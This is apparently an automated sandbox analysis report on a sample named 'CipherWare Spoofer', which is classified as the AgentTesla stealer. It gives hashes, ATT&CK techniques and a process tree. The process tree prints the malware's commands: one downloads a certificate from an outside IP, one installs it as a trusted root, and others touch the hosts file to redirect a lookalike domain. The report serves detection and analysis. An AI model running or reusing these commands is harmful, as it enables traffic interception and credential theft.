agenttesla | 9f0930c6ccac8f9a6a58b056ce2cfa25da6a4c61ce6bdb31d80b963e911e0adf

Analysis

max time kernel
124s
max time network
126s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
11-06-2024 11:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CipherWare Spoofer 04-29/Spoofer.exe
Size

5.9MB
MD5

482183f599a399384629aa7deb145b2e
SHA1

252c735e209efea8f92dafe4c50aea95f60915f2
SHA256

c941f6995ef56ab0fa76f5c604c134e86b5df21b45284e78669f3074be2473e7
SHA512

72eb143ae229041b9d3cd219df7cc54138c9f99f81409a825cdc9741b0483cf4dabfe7b9f410d843263cf665ebc171fbc6168c83ecbb14d123d4a3fe8d565c25
SSDEEP

98304:RXbIrqdcbu8gacqECpO0zSU8B2lJtc/jXwYUObL4Eyv3ZjmzTm7Sw:VIJbu8jzXyuY0YTf/+jmz5

Score

10^/10

agenttesla execution keylogger spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

AgentTesla payload 1 IoCs

resource	yara_rule
behavioral29/memory/2480-37-0x0000000008410000-0x0000000008624000-memory.dmp	family_agenttesla

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2600	powershell.exe
2576	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2480	UBFAFGEWG.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	UBFAFGEWG.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	UBFAFGEWG.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	UBFAFGEWG.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2444	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2600	powershell.exe
2576	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	2480	UBFAFGEWG.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
1200	Spoofer.exe
1200	Spoofer.exe
1200	Spoofer.exe
1200	Spoofer.exe
1200	Spoofer.exe
1200	Spoofer.exe
1200	Spoofer.exe
1200	Spoofer.exe
1200	Spoofer.exe

Suspicious use of SendNotifyMessage 9 IoCs

pid	Process
1200	Spoofer.exe
1200	Spoofer.exe
1200	Spoofer.exe
1200	Spoofer.exe
1200	Spoofer.exe
1200	Spoofer.exe
1200	Spoofer.exe
1200	Spoofer.exe
1200	Spoofer.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 1200 wrote to memory of 1540	1200	Spoofer.exe	28
PID 1200 wrote to memory of 1540	1200	Spoofer.exe	28
PID 1200 wrote to memory of 1540	1200	Spoofer.exe	28
PID 1540 wrote to memory of 2544	1540	cmd.exe	30
PID 1540 wrote to memory of 2544	1540	cmd.exe	30
PID 1540 wrote to memory of 2544	1540	cmd.exe	30
PID 2544 wrote to memory of 2940	2544	cmd.exe	31
PID 2544 wrote to memory of 2940	2544	cmd.exe	31
PID 2544 wrote to memory of 2940	2544	cmd.exe	31
PID 2544 wrote to memory of 2996	2544	cmd.exe	32
PID 2544 wrote to memory of 2996	2544	cmd.exe	32
PID 2544 wrote to memory of 2996	2544	cmd.exe	32
PID 2544 wrote to memory of 2600	2544	cmd.exe	33
PID 2544 wrote to memory of 2600	2544	cmd.exe	33
PID 2544 wrote to memory of 2600	2544	cmd.exe	33
PID 2544 wrote to memory of 2576	2544	cmd.exe	34
PID 2544 wrote to memory of 2576	2544	cmd.exe	34
PID 2544 wrote to memory of 2576	2544	cmd.exe	34
PID 2544 wrote to memory of 2472	2544	cmd.exe	35
PID 2544 wrote to memory of 2472	2544	cmd.exe	35
PID 2544 wrote to memory of 2472	2544	cmd.exe	35
PID 2472 wrote to memory of 2588	2472	cmd.exe	36
PID 2472 wrote to memory of 2588	2472	cmd.exe	36
PID 2472 wrote to memory of 2588	2472	cmd.exe	36
PID 2472 wrote to memory of 2712	2472	cmd.exe	37
PID 2472 wrote to memory of 2712	2472	cmd.exe	37
PID 2472 wrote to memory of 2712	2472	cmd.exe	37
PID 2544 wrote to memory of 2564	2544	cmd.exe	38
PID 2544 wrote to memory of 2564	2544	cmd.exe	38
PID 2544 wrote to memory of 2564	2544	cmd.exe	38
PID 2544 wrote to memory of 2444	2544	cmd.exe	39
PID 2544 wrote to memory of 2444	2544	cmd.exe	39
PID 2544 wrote to memory of 2444	2544	cmd.exe	39
PID 1200 wrote to memory of 2480	1200	Spoofer.exe	40
PID 1200 wrote to memory of 2480	1200	Spoofer.exe	40
PID 1200 wrote to memory of 2480	1200	Spoofer.exe	40
PID 1200 wrote to memory of 2480	1200	Spoofer.exe	40

C:\Users\Admin\AppData\Local\Temp\CipherWare Spoofer 04-29\Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\CipherWare Spoofer 04-29\Spoofer.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c @echo off & echo Running checklmao.bat silently... & start "" /min /b cmd /c "C:\Users\Admin\AppData\Local\Temp\checklmao.bat & exit"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1540
- - C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\checklmao.bat & exit"
    3⤵
    - Drops file in Drivers directory
    - Suspicious use of WriteProcessMemory
    PID:2544
  - - C:\Windows\system32\certutil.exe
      certutil -store TrustedRoot
      4⤵
      PID:2940
  - - C:\Windows\system32\findstr.exe
      findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
      4⤵
      PID:2996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Invoke-WebRequest -Uri http://188.227.107.14/server.crt -OutFile 'C:\Users\Admin\AppData\Local\Temp\server.crt'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Import-Certificate -FilePath 'C:\Users\Admin\AppData\Local\Temp\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -store TrustedRoot | findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2472
    - - C:\Windows\system32\certutil.exe
        
        certutil -store TrustedRoot
        5⤵
        
        PID:2588
    - - C:\Windows\system32\findstr.exe
        
        findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"
        5⤵
        
        PID:2712
  - - C:\Windows\system32\findstr.exe
      findstr /C:"188.227.107.14 api.valveauthentication.xyz" "C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:2564
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /flushdns
      4⤵
      Gathers network information
      PID:2444
- C:\Users\Admin\AppData\Local\Temp\UBFAFGEWG.exe
  C:\Users\Admin\AppData\Local\Temp\UBFAFGEWG.exe
  2⤵
  - Executes dropped EXE
  - Enumerates system info in registry
  - Suspicious use of AdjustPrivilegeToken
  PID:2480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\UBFAFGEWG.exe

Filesize
4.8MB

MD5
78f93936aa75709bc214e122c58f019a

SHA1
2a83b20c0fbf526cc86af4b80cbca319a21dae6d

SHA256
031c83154c6efbaac14659994730e227138612c2bf740ab44fdc597868e45a61

SHA512
2efb74f82ae46382bfbe9ff93f6092a2b665b5868280f218d3eeef43e6368545b66d55ba81db3ac9323a2ea5df9b960c1166b378d6503ee0a39d3689fed65d90

Download Submit
C:\Users\Admin\AppData\Local\Temp\checklmao.bat

Filesize
1KB

MD5
172008fe1545829cce82cfd1feb4ada1

SHA1
a1eed63e579043f79f9799ad6f46131f4412a35c

SHA256
6540e83a53bb1882c60487c3f31a898ead614e59d725715ec96ad1c05219d524

SHA512
7bd38c65ab4100adac4d6efc2afa72db09ee6bb705c27372ce5f53b62920ab7aef3f0840f5ef5747eb9ed55bad9e4952929062cdd1a8f9da89ad3ce42f0e0cc6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9c49c2c08e39ee6301fffc0f0beb37e6

SHA1
488ae8539fba8331ac3b0b8b096f457e4da65475

SHA256
76f8a7c3843cf357b05704b78964adb08d576393356aefb1c0174d18cdcb51b6

SHA512
ee88dc2c628b2413d85e63652efaa3b887c5ef1544ee0b1f9ba7f419c04d35e39d1c04c37840bd075c715acd4e0d66eaa447a233f5a0a6878346cd063a667603

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2B

MD5
81051bcc2cf1bedf378224b0a93e2877

SHA1
ba8ab5a0280b953aa97435ff8946cbcbb2755a27

SHA256
7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

SHA512
1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Download Submit
memory/2480-34-0x0000000006A90000-0x0000000006F70000-memory.dmp

Filesize
4.9MB

Download
memory/2480-37-0x0000000008410000-0x0000000008624000-memory.dmp

Filesize
2.1MB

Download
memory/2480-36-0x00000000002F0000-0x0000000000304000-memory.dmp

Filesize
80KB

Download
memory/2480-35-0x0000000006F70000-0x00000000070BE000-memory.dmp

Filesize
1.3MB

Download
memory/2480-33-0x00000000011F0000-0x00000000016BE000-memory.dmp

Filesize
4.8MB

Download
memory/2576-24-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/2576-23-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2600-17-0x0000000002720000-0x0000000002728000-memory.dmp

Filesize
32KB

Download
memory/2600-16-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download